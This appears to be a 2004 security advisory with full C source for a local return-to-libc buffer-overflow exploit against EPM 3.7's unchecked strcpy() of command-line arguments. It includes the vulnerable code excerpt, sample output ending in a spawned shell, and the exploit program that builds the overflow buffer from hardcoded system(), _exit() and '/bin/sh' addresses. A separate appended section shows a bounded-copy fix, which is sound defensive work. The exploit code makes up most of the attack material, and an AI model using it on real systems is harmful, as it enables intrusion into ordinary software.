EPM Buffer Overflow retlibc exploit

Article author: setnf@flowsecurity.org

/*
 * Details
 *
 * Vulnerable systems:
 *   * EPM version 3.7
 *
 * Because epm.c copies command-line parameters with strcpy() without
 * checking their length, the stack can be smashed and the return address
 * overwritten. A small excerpt from the code:
 *
 * --- epm.c ---
 * 350: else if (strchr(argv[i], '=') != NULL)
 * 351:     putenv(argv[i]);
 * 352: else if (prodname[0] == '\0')
 * 353:     strcpy(prodname, argv[i]);
 * 354: else if (listname[0] == '\0')
 * 355:     strcpy(listname, argv[i]);
 * --- epm.c ---
 *
 * Running the exploit would yield:
 *
 * [!] Usage: ./flow-epm <path> <offset>
 *
 * flowsecurity $ ./flow-epm ./epm 15
 * [*] Program name : [./epm]
 * [*] Offset : [15]
 * [*] system() address : [0x4006d4b0]
 * [*] _exit() address : [0x400d8088]
 * [*] /bin/sh address : [0x40151439]
 *
 * [!]: Bad address
 * sh-2.05b$
 *
 *  _____ _
 * | ___| | _____ ___
 * | |_ | |/ _ \ \ /\ / /
 * | _| | | (_) \ V V /
 * |_| |_|\___/ \_/\_/
 * Security Group.
 *
 * Description: flow-epm.c (www.flowsecurity.org)
 *
 * Proof of Concept local RetLibc exploit for EPM 3.7 (not suid by default).
 *
 * It has been successfully tested on:
 *
 *   Suse Linux 9.0
 *
 * Greets:
 *
 *   Luiz Fernando Camargo
 *   Jefferson Cechinel
 *   Gerrit
 *   fAil
 *   newbug
 *
 * Date: 29 Sep 2004
 *
 * Author:
 *   Thyago Silva - setnf@flowsecurity.org
 */


#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>

#define PNAME "./epm"       /* program name */
#define NOP   0x90          /* No Operation */

/* You need to change these addresses to match your libc */
#define SYSTEM 0x4006d4b0   /* system() address in libc */
#define EXIT   0x400d8088   /* _exit() address in libc */
#define SHELL  0x40151439   /* "/bin/sh" string address in libc */

int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "############## Flow Security ##############\n");
        fprintf(stderr, "#      RetLibc Exploit for EPM - 3.7      #\n");
        fprintf(stderr, "#       setnf@flowsecurity.org            #\n");
        fprintf(stderr, "###########################################\n\n");
        fprintf(stderr, "[!] Usage: %s <path> <offset>\n\n", argv[0]);
        exit(0);
    }

    int TBUFF = ((256 + 4) + (4 * 3) + 1);   /* total buffer */
    int NBUFF = ((256 / 4) + atoi(argv[2])); /* NOP buffer with offset, in 4-byte words */

    fprintf(stderr, "[*] Program name : [%s]\n", argv[1]);
    fprintf(stderr, "[*] Offset : [%d]\n", atoi(argv[2]));

    char buf[TBUFF];

    int *p = (int *)buf;   /* word-sized view of the buffer (32-bit target) */

    fprintf(stderr, "[*] system() address : [%p]\n", (void *)SYSTEM);
    fprintf(stderr, "[*] _exit() address : [%p]\n", (void *)EXIT);
    fprintf(stderr, "[*] /bin/sh address : [%p]\n", (void *)SHELL);

    /* fill the first part of the buffer */

    memset(buf, NOP, TBUFF);
    p += NBUFF;

    /* prepare the stack */

    *p++ = SYSTEM;
    *p++ = EXIT;
    *p++ = SHELL;
    *p = 0x0;

    /* run the vulnerable program; argv[1] + 2 skips the leading "./" */

    execl(argv[1], argv[1] + 2, buf, (char *)NULL);
    perror("\n[!]");   /* only reached if execl() fails */
    return 1;
}
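As an added example that is not part of the original post or of EPM's own code: the argv-parsing branches from the epm.c excerpt above, with the two strcpy() calls replaced by a bounded copy that rejects an oversized argument instead of overflowing the destination. The buffer sizes PRODNAME_SZ and LISTNAME_SZ and the function names are assumptions (the real sizes in epm.c are not shown here); the putenv() branch is kept as a no-op.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes for this example only. */
#define PRODNAME_SZ 256
#define LISTNAME_SZ 256

/* Bounded replacement for strcpy(prodname, argv[i]) / strcpy(listname, argv[i]).
 * Returns 0 on success, -1 if src plus its NUL does not fit in dstsz.
 * memchr() is limited to dstsz bytes, so an unterminated src is not over-read. */
int copy_arg_bounded(char *dst, size_t dstsz, const char *src)
{
    const char *nul = memchr(src, '\0', dstsz);
    if (nul == NULL)
        return -1;                       /* no terminator within dstsz: would overflow */
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Same control flow as epm.c lines 350-355, with the unbounded copies replaced.
 * Returns 0, or -1 on the first oversized argument; the destination buffer is
 * left untouched in that case so the caller can report the error and exit. */
int parse_args(int argc, char *argv[], char *prodname, size_t prodsz,
               char *listname, size_t listsz)
{
    for (int i = 1; i < argc; i++) {
        if (strchr(argv[i], '=') != NULL) {
            continue;                    /* putenv(argv[i]) in epm.c; no-op here */
        } else if (prodname[0] == '\0') {
            if (copy_arg_bounded(prodname, prodsz, argv[i]) != 0)
                return -1;
        } else if (listname[0] == '\0') {
            if (copy_arg_bounded(listname, listsz, argv[i]) != 0)
                return -1;
        }
    }
    return 0;
}

int main(int argc, char *argv[])
{
    char prodname[PRODNAME_SZ] = "", listname[LISTNAME_SZ] = "";
    if (parse_args(argc, argv, prodname, sizeof prodname, listname, sizeof listname) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n", sizeof prodname - 1);
        return 1;
    }
    printf("prodname=[%s] listname=[%s]\n", prodname, listname);
    return 0;
}
```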
